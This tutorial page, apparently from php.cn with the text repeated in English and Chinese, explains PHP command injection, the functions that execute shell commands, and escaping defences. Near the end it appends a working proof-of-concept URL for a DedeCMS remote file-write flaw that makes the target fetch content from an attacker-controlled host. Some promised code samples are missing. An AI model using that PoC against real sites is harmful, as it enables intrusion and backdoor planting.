Home  >  Article  >  Backend Development  >  PHP command injection dedecms remote writing file link example sharing

PHP command injection dedecms remote writing file link example sharing

小云云
小云云Original
2018-03-12 11:59:082512browse

PHP command injection attack vulnerability is one of the common script vulnerabilities in PHP applications. Famous domestic web applications such as Discuz! and DedeCMS have all had this type of vulnerability.

Command Injection, that is, a command injection attack, refers to the way that hackers can construct special command strings because web applications do not strictly filter data submitted by users. Submit data to a web application, and use this method to execute external programs or system commands to carry out attacks, illegally obtain data or network resources, etc.
The main reason for the existence of PHP command injection attacks is that when web application programmers use some functions with command execution functions in the PHP language, the data content submitted by the user is brought into the function for execution without strict filtering. . For example, when the data content submitted by the hacker is to write a PHP file to the website directory, the command can be used to inject the attack vulnerability into a PHP backdoor file, and then carry out further penetration attacks.
 The harm and impact caused by PHP command injection attack vulnerabilities are very serious. The following methods can be used to prevent the existence of command injection attack vulnerabilities:
1. Try not to execute external applications or commands.
 2. Use custom functions or function libraries to implement the functions of external applications or commands.
 3. Determine the parameter content before executing functions such as system and eval.
 4. Use the escapeshellarg function to process relevant parameters. The escapeshellarg function will escape any characters that cause the end of parameters or commands. For example, the single quote "'" will be escaped as "\'", the double quote """ will be escaped as "\"", and the semicolon " ";" will be escaped as "\;", so escapeshellarg will limit the parameter content to a pair of single quotes or double quotes, and escape the single quotes or double quotes contained in the parameters, making it impossible to truncate the current execution. , to achieve the purpose of preventing command injection attacks.
 5. Use safe_mode_exec_dir to execute the executable file path. Set safe_mode in the php.ini file to On, then put the executable file into a directory and use safe_mode_exec_dir to specify the executable file path. In this way, when the corresponding external program needs to be executed, the program must be in the directory specified by safe_mode_exec_dir before execution is allowed, otherwise the execution will fail.
 PHP command injection attack vulnerability is one of the common vulnerabilities in PHP applications. Famous domestic PHP applications, such as Discuz!, Dedecms and other large-scale programs, have been reported to have command injection attack vulnerabilities on the Internet. Hackers can quickly obtain website permissions through command injection attack vulnerabilities, and then carry out malicious attacks such as horse-mounting and phishing. The impact and harm caused are huge. At the same time, PHP language is currently used in a large proportion of web application development. Web application programmers should understand the dangers of command injection attack vulnerabilities, patch vulnerabilities that may be exploited by hackers in the program, and protect the security of network users. Attacked by malicious codes such as Trojans and phishing

Utilization of command execution functions

In PHP, it is possible to execute external programs or functions The command execution function includes the following 5 functions.

2.1 The system function

can be used to execute an external application and output the corresponding execution results. The function prototype is as follows: string system (string command, int &return_var) Among them, command is the command to be executed, and return_var stores the status value after execution of the command. According to the ideas of PHP programmers, the main function of the command execution function is to interact with the Web application through the command execution function and execute external programs or system commands through the Web application. For example, the Web application programmer wants to obtain the IP address through the system function. User and other information, then he can achieve it by constructing the following code. In the following code, a variable named $action is defined, whose value is the obtained cmd value, system($action)); where $action is the parameter of system, that is, the command to be executed. When we are debugging PHP, when we use var_dump or print_r to print data or arrays, the HTML page does not display line breaks. We see a lot of content and it is difficult to locate. Add e03b848252eb9375d56be284e690e873 before output to automatically format line breaks for display. .
Enter "http://localhost/test.php?cmd=ipconfig" in the browser address bar. When the value of cmd is assigned to ipconfig, the system function outputs the IP address information =

2.2 The exec function

can be used to execute an external application. The function prototype is as follows:

string exec ( string $command [, array &$output [, int &$return_var ]] ),

where command is the command to be executed, output is the string string for each line of output of the executed command, and return_var stores the status value after executing the command.

2.3 passthru function

can be used to execute a system command and display the original output. When the output of the system command is binary When the data needs to be returned directly to the browser, the passthru function needs to be used to replace the system and exec functions. The Passthru function prototype is as follows:

void passthru (string command, int &return_var),


where command is the command to be executed, and return_var stores the status value after executing the command. You can test it by constructing the following PHP code.

2.4 shell_exec function

Execute the shell command and return the output string. The function prototype is as follows:

string shell_exec (string command),

command
is the command to be executed.

2.5 "Backticks

have the same function as shell_exec, execute the shell command and return the output string.

2.6 Popen function

#popen() function opens the process file pointer, that is, opens a pipe pointing to the process, which is executed by the derived command command. Produced. Returns a file pointer, but it is one-way (can only be used for reading or writing) and must be closed with pclose(). If an error occurs, the function prototype is as follows: popen(string $command,string. $mode), where command specifies the command to be executed, mode specifies the connection mode, r is read-only, and w is write-only.

2.7 proc_open function

Used to execute a command and open the file pointer for input/output. Similar to the popen() function, but proc_open() provides a more powerful ability to control program execution. The function prototype is as follows:
resource proc_open ( string $cmd , array $descriptorspec , array &$pipes [, string $cwd [, array $env [, array $other_options ]]] )

2.8pcntl_exec Function

##pcntl_exec function executes the specified program in the current process space. It returns FALSE when an error occurs, and does not return when there is no error. The function prototype is as follows: void pcntl_exec ( string $path [, array $ args [, array $envs ]] ) where path must be an executable binary path or a script that specifies an executable path header on the first line of the file; args is a string of arguments to be passed to the program Array; envs is an array of strings to be passed to the program as environment variables. This array is in the format of key => value, where key represents the name of the environment variable to be passed, and value represents the value of the environment variable. #Defense function

When the data entered by the user is used as a function parameter, you can use the escapeshellarg() or escapeshellcmd() function to filter the data entered by the user to prevent the user from entering the data. Trick the system into executing arbitrary commands.

3.1 The escapeshellcmd() function

removes special symbols in the string and escapes all characters in the command. shell metacharacters to get the job done. These metacharacters include: # & ;``,| * ? ~ 6d267e5fab17ea8bc578f9e7e5e1570b ^ ( ) [ ] { } $ \\. The function prototype is as follows: string escapeshellcmd(string command). This function removes special symbols in the string to prevent users from maliciously cracking the server system.

3.3 escapeshellarg function

This function transcodes a string into parameters that can be used in shell commands. escapeshellarg() will add a single quote to the string and can quote or escape any existing single quotes, thus ensuring that a string can be passed directly into the shell function and still be safe. This function should be used for some parameters entered by the user. It can be used in PHP security, which will filter out some special characters present in arg. If the input parameters contain Chinese characters and are passed to escapeshellarg, they will be filtered out. The function prototype is as follows: string escapeshellarg (string $arg), where arg is the parameter that needs to be escaped.

Attachment: dedecms remote file writing vulnerability link (not related to the knowledge points of this article)
https://www.seebug.org/vuldb/ssvid-89354
poc:
http://Target IP/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=hello.php&updateHost=http://http://http server controlled by yourself/

PHP command injection attack vulnerability is one of the common script vulnerabilities in PHP applications. Famous domestic web applications Discuz!, DedeCMS, etc. have all had this type of vulnerability.
Command Injection, that is, a command injection attack, refers to the fact that because the web application does not strictly filter the data submitted by the user, the hacker can submit the data to the web application by constructing a special command string and use the Execute external programs or system commands to carry out attacks, illegally obtain data or network resources, etc.
The main reason for the existence of PHP command injection attacks is that when web application programmers use some functions with command execution functions in the PHP language, the data content submitted by the user is brought into the function for execution without strict filtering. . For example, when the data content submitted by the hacker is to write a PHP file to the website directory, the command can be used to inject the attack vulnerability into a PHP backdoor file, and then carry out further penetration attacks.
 The harm and impact caused by PHP command injection attack vulnerabilities are very serious. The following methods can be used to prevent the existence of command injection attack vulnerabilities:
1. Try not to execute external applications or commands.
 2. Use custom functions or function libraries to implement the functions of external applications or commands.
 3. Before executing functions such as system and eval, determine the parameter content.
 4. Use the escapeshellarg function to process related parameters. The escapeshellarg function will escape any characters that cause the end of parameters or commands. For example, the single quote "'" will be escaped as "\'", the double quote """ will be escaped as "\"", and the semicolon " ";" will be escaped as "\;", so escapeshellarg will limit the parameter content to a pair of single quotes or double quotes, and escape the single quotes or double quotes contained in the parameters, making it impossible to truncate the current execution. , to achieve the purpose of preventing command injection attacks.
 5. Use safe_mode_exec_dir to execute the executable file path. Set safe_mode in the php.ini file to On, then put the executable file into a directory and use safe_mode_exec_dir to specify the executable file path. In this way, when the corresponding external program needs to be executed, the program must be in the directory specified by safe_mode_exec_dir before execution is allowed, otherwise the execution will fail.
 PHP command injection attack vulnerability is one of the common vulnerabilities in PHP applications. Famous domestic PHP applications, such as Discuz!, Dedecms and other large-scale programs, have been reported to have command injection attack vulnerabilities on the Internet. Hackers can quickly obtain website permissions through command injection attack vulnerabilities, and then carry out malicious attacks such as horse-mounting and phishing. The impact and harm caused are huge. At the same time, PHP language is currently used in a large proportion of Web application development. Web application programmers should understand the dangers of command injection attack vulnerabilities, patch the vulnerabilities that may be exploited by hackers in the program, and protect the security of network users. Attacked by malicious codes such as Trojans and phishing

Utilization of command execution functions

In PHP, it is possible to execute external programs or functions The command execution function includes the following 5 functions.

2.1  system函数

可以用来执行一个外部的应用程序并将相应的执行结果输出,函数原型如下:string system(string command, int &return_var)其中,command是要执行的命令,return_var存放执行命令的执行后的状态值。按照PHP程序员的想法,命令执行函数的主要作用是可以通过命令执行函数与Web应用程序进行交互,通过Web应用程序执行外部程序或系统命令,如Web应用程序员想通过system函数获取IP地址、用户等信息,那么他可以通过构造如下代码实现。在下面的代码中,定义了一个名为$action的变量,其值为获得的cmd值,system($action));中$action为system的参数,即要执行的命令。当我们PHP调试的时候,用var_dump 或 print_r打印数据或数组时,html页面没有换行显示,看到的内容一大堆,不好定位,输出前添加 e03b848252eb9375d56be284e690e873,便可以自动格式化换行显示。
在浏览器地址栏输入”http://localhost/test.php?cmd=ipconfig”,当cmd的值赋值为ipconfig时,system函数输出IP地址信息=

2.2      exec函数

可以用来执行一个外部的应用程序,函数原型如下:

string exec ( string $command [, array &$output [, int &$return_var ]] ),


其中command是要执行的命令,output是获得执行命令输出的每一行字符串,return_var存放执行命令后的状态值。

2.3  passthru函数

可以用来执行一个系统命令并显示原始的输出,当系统命令的输出是二进制的数据,并且需要直接返回值给浏览器时,需要使用passthru函数来替代system与exec函数。Passthru函数原型如下:

void passthru (string command, int &return_var),


其中command是要执行的命令,return_var存放执行命令后的状态值。可以通过构造如下PHP代码进行测试。

2.4  shell_exec函数

执行shell命令并返回输出的字符串,函数原型如下:
string shell_exec (string command),command是要执行的命令。

2.5  ”反引号

与shell_exec功能相同,执行shell命令并返回输出的字符串。

2.6  Popen函数

popen() 函数打开进程文件指针,即打开一个指向进程的管道,该进程由派生指定的 command 命令执行而产生。返回一个文件指针,只不过它是单向的(只能用于读或写)并且必须用pclose()来关闭。若出错,则返回 false。函数原型如下:popen(string $command,string $mode),其中,command为规定要执行的命令,mode规定连接模式,r为只读,w为只写。

2.7  proc_open函数

用于执行一个命令,并且打开用来输入/输出的文件指针。与popen()函数类似,但是 proc_open()提供了更加强大的控制程序执行的能力。函数原型如下:

resource proc_open ( string $cmd , array $descriptorspec , array &$pipes [, string $cwd [, array $env [, array $other_options ]]] )


2.8pcntl_exec函数

pcntl_exec函数在当前进程空间执行指定程序。当发生错误时返回 FALSE,没有错误时没有返回。函数原型如下:void pcntl_exec ( string $path [, array $args [, array $envs ]] )其中,path必须是可执行二进制文件路径或一个在文件第一行指定了一个可执行文件路径标头的脚本;args是一个要传递给程序的参数的字符串数组;envs是一个要传递给程序作为环境变量的字符串数组。这个数组是 key => value格式的,key代表要传递的环境变量的名称,value代表该环境变量值。

防御函数

当用户输入的数据作为函数参数时,可以使用escapeshellarg()或escapeshellcmd()函数来过滤用户输入的数据,防止用户欺骗系统执行任意命令。

3.1  escapeshellcmd()函数

除去字符串中的特殊符号,会转义命令中的所有shell元字符来完成工作。这些元字符包括:# & ;``,| * ? ~ 6d267e5fab17ea8bc578f9e7e5e1570b ^ ( ) [ ] { } $ \\。函数原型如下:string escapeshellcmd(string command)。本函数除去了字符串中的特殊符号,可以防止使用者恶意破解服务器系统。

3.3  escapeshellarg函数

该函数把字符串转码为可以在shell命令里使用的参数。escapeshellarg()将给字符串增加一个单引号并且能引用或者转码任何已经存在的单引号,这样以确保能够直接将一个字符串传入shell函数,并且还是确保安全的。对于用户输入的部分参数就应该使用这个函数。可以用到php的安全中,会过滤掉arg中存在的一些特殊字符。在输入的参数中如果包含中文传递给escapeshellarg,会被过滤掉。函数原型如下:

string escapeshellarg ( string $arg )

,其中arg为需要被转码的参数。

The above is the detailed content of PHP command injection dedecms remote writing file link example sharing. For more information, please follow other related articles on the PHP Chinese website!

Statement:
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn